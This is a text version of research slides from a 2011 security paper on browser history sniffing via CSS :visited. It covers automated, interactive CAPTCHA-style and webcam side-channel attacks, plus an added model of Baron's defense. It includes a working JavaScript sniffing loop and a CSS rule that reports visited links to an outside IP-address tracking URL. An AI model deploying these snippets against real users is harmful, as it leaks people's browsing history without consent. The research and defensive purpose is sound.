I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson
Carnegie Mellon University
IEEE Symposium on Security and Privacy, May 2011

Outline (slide 3)
- Introduction
- Automated Attacks
- Exp 1: Interactive Attacks
- Exp 2: Side-Channel Attacks
- Related Work
- Conclusion

Introduction (slide 4)
History sniffing through CSS :visited
Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271
In HTML:
    <a id="link1" href="http://google.com/">Visit Google!</a>
In CSS:
    #link1:visited {
        color: red;
        background: url(http://140.115.53.28/track.php?url=google.com);
    }

Introduction (slide 5)
L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy
- Make getComputedStyle act as though all links are unvisited.
- Make certain CSS selectors act as though links are always unvisited.
- Limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke.
The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense, but they are still vulnerable to interactive attacks.

Introduction (slide 6)
Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
- Small sets of links (6~220) probed by real exploiters
- 46 popular websites, including one from the Alexa Top 100
This makes interactive attacks possible.

Introduction (slide 7)
What can history sniffers do?
Benign:
- Websites could use history sniffing to determine whether their users have visited known phishing sites.
- Websites could seed visitors' history with URLs made up for the purpose, and use the URLs to re-identify their visitors.
  (Cookies)
Malicious:
- Track visitors across sites for advertising purposes, determining whether they also visit a site's competitors.
- Attackers can construct more targeted phishing pages by impersonating only sites that a particular victim is known to visit.

Automated Attacks (slide 8)
Direct sniffing
    <style> a:visited { color: red; } </style>

    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
        // point the probe link at the next URL to test
        link_el.href = url_array[i];
        // a visited link picks up the :visited color from the style sheet
        if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
            visited_array.push(url_array[i]);
        }
    }

Automated Attacks (slide 9)
Indirect sniffing
- Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
- Make visited and unvisited links cause different images to load (a background-image style used in the :visited rule). Does not require JavaScript.

Automated Attacks (slide 10)
Side-channel sniffing
- Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited.
- Transparent underline
- Any other style rules in :visited
Defense: Baron's solution does well against all three types above (direct/indirect/side-channel).

Exp 1: Interactive Attacks (slide 11)
- Requires victims to interact with malicious sites.
- The authors claim that interactive attacks can be disguised as "normal" interactive tasks that users will not find surprising or suspicious.
- Amazon's Mechanical Turk: 307 participants recruited.
- All tasks in this experiment operate within the constraints of Baron's defense: visited-link styles only change the color on the screen.
- The tasks pretend to be CAPTCHA tests (CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart).

Exp 1: Interactive Attacks (slide 12)
1. Word CAPTCHA
   Each word is a hyperlink to a URL that the attacker wishes to probe; if unvisited, it is drawn in the same color as the background.

Exp 1: Interactive Attacks (slide 13)
2.
Character CAPTCHA
   Seven-segment LCD symbols; every letter represents 3 URLs; site-supplied font.

Exp 1: Interactive Attacks (slide 14)
   4+5=9; 4+F=A; 5+F=6; 4+5+F=8 ("-" is always on)

Exp 1: Interactive Attacks (slide 15)
3. Chessboard puzzle
   Each square contains a URL; only the pawns corresponding to visited sites are made visible. SVG or text is used to control the pawns.

Exp 1: Interactive Attacks (slide 16)
4. Pattern matching puzzle

Exp 1: Interactive Attacks (slide 17)
Randomly generated task instances corresponding to known proportions of visited and unvisited links.

Exp 1: Interactive Attacks (slide 18)
Automated history-sniffing exploits run on all the participants: URL set from wtikay.com, 7012 commonly visited URLs (from the Alexa Top 5000).

Exp 1: Interactive Attacks (slides 19-23)
[Result figures; no text recovered]

Exp 2: Side-channel Attacks (slide 24)
Webcam attacks
- <blink>
- Random 20 URLs with 10 visited ones
- Variant 1: designed to comply with the WCAG standard for seizure safety
- Variant 2: make the entire browser window flash, with a brighter color

Exp 2: Side-channel Attacks (slide 25)
Author test
- 100% accuracy for both variants in all conditions: well-lit room, person stays still in front of the computer
- In a dark room, accuracy dropped to 50%
Field test
- 60 / 307 participants

Exp 2: Side-channel Attacks (slide 26)
Field test
[Result figure; no text recovered]

Exp 2: Side-channel Attacks (slide 27)
In real life: ChatRoulette service. The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor.

Related Work (slide 28)
- Page cache: Felten et al., Timing Attacks on Web Privacy
- DNS cache: Felten et al., Timing Attacks on Web Privacy
  Both tactics above: only for the first time; short-term history.
- Loadable cross-origin, but only available to logged-in users (Facebook, Gmail, Twitter, etc.)
  JavaScript onerror event

Related Work (slide 29)
- Cookies, Flash Player local shared objects
- Ad-blockers, private browsing mode

Conclusion (slide 30)
- Automated history sniffing attacks have successfully been blocked by Baron's solution; interactive attacks have not.
- This paper developed proofs of concept for 6 history sniffing exploits against Baron's defense: 4 interactive attacks and 2 that detect the screen through a webcam.
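To show why the conclusion holds for the automated attacks, here is an added model (not code from the slides or the paper) of two rules of Baron's defense from slide 5: script-visible computed style always reports the unvisited values, and a :visited rule is cut down to the permitted color properties. The style-engine stand-in (makeLink, restrictVisitedRule, sniff) and the constructed history are hypothetical, not a real DOM.

```javascript
// Properties a :visited rule may still change under Baron's defence (slide 5).
const VISITED_ALLOWED = new Set([
  "color", "background-color", "outline-color", "column-rule-color",
  "fill", "stroke",
]);

function isVisitedAllowed(prop) {
  return VISITED_ALLOWED.has(prop) || /^border-([a-z]+-)?color$/.test(prop);
}

// Drop every declaration in a :visited rule that the defence forbids, so
// background-image, font-size, etc. can no longer depend on history.
function restrictVisitedRule(declarations) {
  const kept = {};
  for (const [prop, value] of Object.entries(declarations)) {
    if (isVisitedAllowed(prop)) kept[prop] = value;
  }
  return kept;
}

// Hypothetical model of the style engine (not a real DOM): the browser
// knows the history privately; the painted style depends on it, but the
// computed style handed to script is always the unvisited one.
function makeLink(href, history, unvisitedStyle, visitedStyle) {
  const paint = { ...unvisitedStyle };
  if (history.has(href)) Object.assign(paint, restrictVisitedRule(visitedStyle));
  return { href, paint, computedStyle: { ...unvisitedStyle } };
}

// The slide-8 loop rewritten against the model: it can only read
// computedStyle, so with the defence in place it never sees red.
function sniff(urls, history) {
  const found = [];
  for (const url of urls) {
    const link = makeLink(url, history,
      { color: "rgb(0, 0, 255)" }, { color: "rgb(255, 0, 0)" });
    if (link.computedStyle.color === "rgb(255, 0, 0)") found.push(url);
  }
  return found;
}

// Stand-alone demo with a constructed history: prints [] (nothing sniffed).
console.log(sniff(["http://a.com", "http://b.com"], new Set(["http://a.com"])));
```

The painted style still turns red for the visited link, which is exactly the residual signal the interactive attacks on slides 12 to 16 exploit.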